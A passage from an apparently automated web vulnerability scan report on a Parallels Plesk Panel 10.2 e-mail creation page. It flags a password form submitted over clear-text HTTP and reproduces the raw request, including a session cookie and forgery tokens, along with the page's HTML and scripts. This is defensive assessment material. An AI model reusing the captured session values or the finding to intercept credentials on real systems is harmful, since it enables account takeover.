<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/email-address/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:50 GMT
Connection: close
Content-Length: 39818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>Create E-mail Address - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fcreate%2F' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span>Create E-mail Address</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="" class="input-text" /><b> @ vulnerable.host.fqdn</b> </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
